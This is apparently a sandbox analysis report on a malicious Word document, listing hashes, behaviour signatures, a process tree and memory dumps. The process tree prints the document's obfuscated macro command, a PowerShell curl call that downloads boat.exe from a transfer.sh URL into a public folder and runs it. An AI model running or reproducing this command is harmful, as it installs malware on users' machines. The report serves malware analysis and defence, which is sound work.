Overview

overview

10

Static

static

8

17cfb90deb...1b.doc

windows7-x64

10

17cfb90deb...1b.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    14/10/2023, 00:58

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    17cfb90deb531e2068d99e671423d8d1bcf8f06a0e2666f0108ca8e8b706dd1b.doc

  • Size

    191KB

  • MD5

    68297123bc1ddbbd9336aa121a9dd534

  • SHA1

    2d8016319edb893e0ae600ba8c89f00a30466967

  • SHA256

    17cfb90deb531e2068d99e671423d8d1bcf8f06a0e2666f0108ca8e8b706dd1b

  • SHA512

    29e3e9e7e8a1b5c9fd54d97379e7f73cc2ee8174b950d7bf1b44f6f129893d6dec64c8ddb63f071184ea93bc88f1e5b7d0e1f99304c4af54f42af9042f6d092b

  • SSDEEP

    3072:SbiyWTxSoVHpNY6nemhInf/va46YP6z+dzL:miyWTwoVHp6m0/yl6H9L

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\17cfb90deb531e2068d99e671423d8d1bcf8f06a0e2666f0108ca8e8b706dd1b.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2988
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/gj04sqKk7O/boat.e^xe -o C:\Users\Public\dx5ys.exe;C:\Users\Public\dx5ys.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2792
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/gj04sqKk7O/boat.exe -o C:\Users\Public\dx5ys.exe;C:\Users\Public\dx5ys.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2636
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2060

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
            Filesize

            20KB

            MD5

            d24e2c912055fbdd2cec8722d6a8dedf

            SHA1

            6ead2848e2257a8594038c438c3cf0f27ff1735b

            SHA256

            26c2fea90c560d09862fe8da6ea005788a32b6066fb0492b56d5a4a1c388a451

            SHA512

            69521c25b31796f7c9cae8c0dbcc61547d0ae0bd04391987dcb2e3ba464590414a69a6e8308c761ca45ff74a1ff4ec9644d80f462f306912c5017387d9a96890

            Download Submit

          • memory/2636-21-0x000000006AC00000-0x000000006B1AB000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/2636-23-0x0000000002690000-0x00000000026D0000-memory.dmp

            Filesize

            256KB

            Download

          • memory/2636-26-0x000000006AC00000-0x000000006B1AB000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/2636-14-0x0000000002690000-0x00000000026D0000-memory.dmp

            Filesize

            256KB

            Download

          • memory/2636-22-0x0000000002690000-0x00000000026D0000-memory.dmp

            Filesize

            256KB

            Download

          • memory/2636-11-0x000000006AC00000-0x000000006B1AB000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/2636-13-0x0000000002690000-0x00000000026D0000-memory.dmp

            Filesize

            256KB

            Download

          • memory/2636-12-0x000000006AC00000-0x000000006B1AB000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/2988-2-0x000000007142D000-0x0000000071438000-memory.dmp

            Filesize

            44KB

            Download

          • memory/2988-20-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

            Download

          • memory/2988-19-0x000000007142D000-0x0000000071438000-memory.dmp

            Filesize

            44KB

            Download

          • memory/2988-0-0x000000002FBA1000-0x000000002FBA2000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2988-7-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

            Download

          • memory/2988-6-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

            Download

          • memory/2988-5-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

            Download

          • memory/2988-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2988-44-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

            Download

          • memory/2988-45-0x000000007142D000-0x0000000071438000-memory.dmp

            Filesize

            44KB

            Download